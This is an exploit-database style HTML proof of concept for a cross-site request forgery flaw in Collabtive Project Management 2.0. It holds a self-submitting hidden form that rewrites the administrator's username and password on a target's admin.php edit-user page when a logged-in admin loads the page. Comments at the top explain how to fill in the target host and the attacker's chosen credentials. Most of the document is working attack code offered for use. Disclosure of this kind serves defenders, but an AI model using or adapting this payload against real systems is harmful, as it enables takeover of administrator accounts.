<!--
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title : Collabtive Project Management 2.0 CSRF Vulnerability
[+]
[+] Version : 2.0
[+]
[+] Exploit Author : Ashiyane Digital Security Team
[+]
[+] Vendor Homepage: http://collabtive.o-dyn.de/
[+]
[+] Software Link: http://collabtive.o-dyn.de/downloadref.php
[+]
[+] Date: 4 Oct 2015
[+]
[+] Tested On : Kali Linux , BackTrack , Windows 8.1
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] #This exploit will change the admin's information.
[+]
[+] #You Can Modify The Form Values And The Address( The [HOST] Section),
[+]
[+] #You Can Update Existing Admin With This Vulnerability
[+]
[+] #Change The [HACKER] To Whatever You Want.It Will Be Your Admin Username.
[+]
[+] #Change The [PASSWORD] To Whatever You Want.It Will Be Your Admin Password.
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]Exploit Code:
-->
<body onload="document.exploit.submit();">
<forM class="main" method="post" Action="[HOST]/admin.php?action=edituser&id=1" enctype="multipart/form-data" name="exploit">
<input type = "HiDden" class="hIdden" value = "[HACKER]" name = "name" id="name" required="1" realname="Name" tabindex="1" /></td>
<input type="HIDDEN" class="hidden-file" name = "thefile" id="thefile">
<input type = "hidden" name = "company" id = "company" value = "0" />
<input type = "hidden" class="hidden" value = "" name = "email" id="email" regexp="EMAIL" required="1" realname ="E-Mail" /></td>
<input type = "hidden" class="hidden" value = "0" name = "rate" id="rate" />
<input type = "hidden" class="hidden" name = "web" id = "web" realname = "URL" value = "" />
<input type = "hidden" class="hidden" value = "" name = "tel1" id="tel1" />
<input type = "hidden" class="hidden" value = "" name = "tel2" id="tel2" />
<input type = "hidden" value = "" name = "address1" id="address1" />
<input type = "hidden" name = "zip" id = "zip" realname = "Postcode" value = "" />
<input type = "hidden" class="hidden" value = "" name = "address2" id="address2" />
<input type = "hidden" class="hidden" value = "" name = "country" id="country" />
<input type = "hidden" class="hidden" value = "" name = "state" id="state" autocomplete="off" />
<input type = "hidden" name = "newpass" id = "newpass" autocomplete="off" value="[PASSWORD]"/>
<input type = "hidden" name = "repeatpass" id = "repeatpass" autocomplete="off" value="[PASSWORD]"/>
<input type = "hidden" name = "tags" id = "tags" realname = "Tags" value = "" />
</form>
</body>
<!--
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Vulnerable Pages :
[+]
[+] [HOST]/admin.php
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Discovered by : The Nonexistent
[+] Special Thanks : All Ashiyane Members And Exploiting Team.
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
-->